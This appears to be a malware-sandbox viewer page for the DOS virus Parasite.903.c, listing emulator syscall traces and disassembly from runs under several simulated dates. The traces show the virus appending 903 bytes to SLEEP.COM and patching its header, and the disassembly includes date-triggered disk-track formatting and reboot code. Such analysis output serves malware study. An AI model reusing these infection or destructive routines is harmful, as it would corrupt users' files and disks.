Sample viewer

vx.netlux.org/Virus.DOS.Parasite.903.c

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:51:06.125266172Z	47	PC: 12a79 \| Get disk transfer address
2018-12-17T22:51:06.134275307Z	26	PC: 12a5e \| Set disk transfer address
2018-12-17T22:51:06.135605767Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10448,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:06.311331247Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:28:06.313497467Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:28:06.314882327Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:28:06.318153601Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x44], di 0x12b07: mov si, bx 0x12b09: add si, 0x36 0x12b0c: nop 0x12b0d: mov cx, 6
2018-12-25T12:28:06.322126776Z	78	PC: 12b99 \| Find first file
2018-12-25T12:28:06.330033183Z	67	PC: 12bda \| Get or set file attributes
2018-12-25T12:28:06.336613163Z	67	PC: 12bec \| Get or set file attributes
2018-12-25T12:28:06.354066717Z	61	PC: 12bf7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:28:06.362626462Z	87	PC: 12c03 \| Get or set file date and time
2018-12-25T12:28:06.364717136Z	44	PC: 12c0f \| Get time 0x12c0f: and dh, 7 0x12c12: jmp 0x12c15 0x12c14: nop 0x12c15: mov ah, 0x3f 0x12c17: mov cx, 3 0x12c1a: mov dx, 0x2a 0x12c1d: nop 0x12c1e: add dx, si 0x12c20: int 0x21 0x12c22: jb 0x12c7f 0x12c24: cmp ax, 3 0x12c27: jne 0x12c7f 0x12c29: mov ax, 0x4202 0x12c2c: mov cx, 0 0x12c2f: mov dx, 0 0x12c32: int 0x21 0x12c34: jb 0x12c7f 0x12c36: mov cx, ax 0x12c38: sub ax, 3 0x12c3b: mov word ptr [si + 0x2e], ax
2018-12-25T12:28:06.367047486Z	63	PC: 12c22 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:06.374763113Z	66	PC: 12c34 \| Move file pointer
2018-12-25T12:28:06.3767183Z	64	PC: 12c5e \| Write file or device (Write 903 bytes on handle 5)
2018-12-25T12:28:06.386316628Z	66	PC: 12c70 \| Move file pointer
2018-12-25T12:28:06.388986441Z	64	PC: 12c7f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:06.397209275Z	87	PC: 12c92 \| Get or set file date and time
2018-12-25T12:28:06.399372974Z	62	PC: 12c96 \| Close file
2018-12-25T12:28:06.412337415Z	67	PC: 12ca5 \| Get or set file attributes
2018-12-25T12:28:06.423676935Z	26	PC: 12cb2 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10448,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:06.503479929Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:28:06.505441582Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:28:06.508203851Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:28:06.51361289Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x44], di 0x12b07: mov si, bx 0x12b09: add si, 0x36 0x12b0c: nop 0x12b0d: mov cx, 6
2018-12-25T12:28:06.519660246Z	78	PC: 12b99 \| Find first file
2018-12-25T12:28:06.526258202Z	67	PC: 12bda \| Get or set file attributes
2018-12-25T12:28:06.532283792Z	67	PC: 12bec \| Get or set file attributes
2018-12-25T12:28:06.548514325Z	61	PC: 12bf7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:28:06.555698315Z	87	PC: 12c03 \| Get or set file date and time
2018-12-25T12:28:06.558184513Z	44	PC: 12c0f \| Get time 0x12c0f: and dh, 7 0x12c12: jmp 0x12c15 0x12c14: nop 0x12c15: mov ah, 0x3f 0x12c17: mov cx, 3 0x12c1a: mov dx, 0x2a 0x12c1d: nop 0x12c1e: add dx, si 0x12c20: int 0x21 0x12c22: jb 0x12c7f 0x12c24: cmp ax, 3 0x12c27: jne 0x12c7f 0x12c29: mov ax, 0x4202 0x12c2c: mov cx, 0 0x12c2f: mov dx, 0 0x12c32: int 0x21 0x12c34: jb 0x12c7f 0x12c36: mov cx, ax 0x12c38: sub ax, 3 0x12c3b: mov word ptr [si + 0x2e], ax
2018-12-25T12:28:06.560716083Z	63	PC: 12c22 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:06.567706738Z	66	PC: 12c34 \| Move file pointer
2018-12-25T12:28:06.569547101Z	64	PC: 12c5e \| Write file or device (Write 903 bytes on handle 5)
2018-12-25T12:28:06.578345734Z	66	PC: 12c70 \| Move file pointer
2018-12-25T12:28:06.580878085Z	64	PC: 12c7f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:06.591193332Z	87	PC: 12c92 \| Get or set file date and time
2018-12-25T12:28:06.592658971Z	62	PC: 12c96 \| Close file
2018-12-25T12:28:06.600947411Z	67	PC: 12ca5 \| Get or set file attributes
2018-12-25T12:28:06.61090719Z	26	PC: 12cb2 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10448,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:06.566142428Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:28:06.56771412Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:28:06.568745118Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3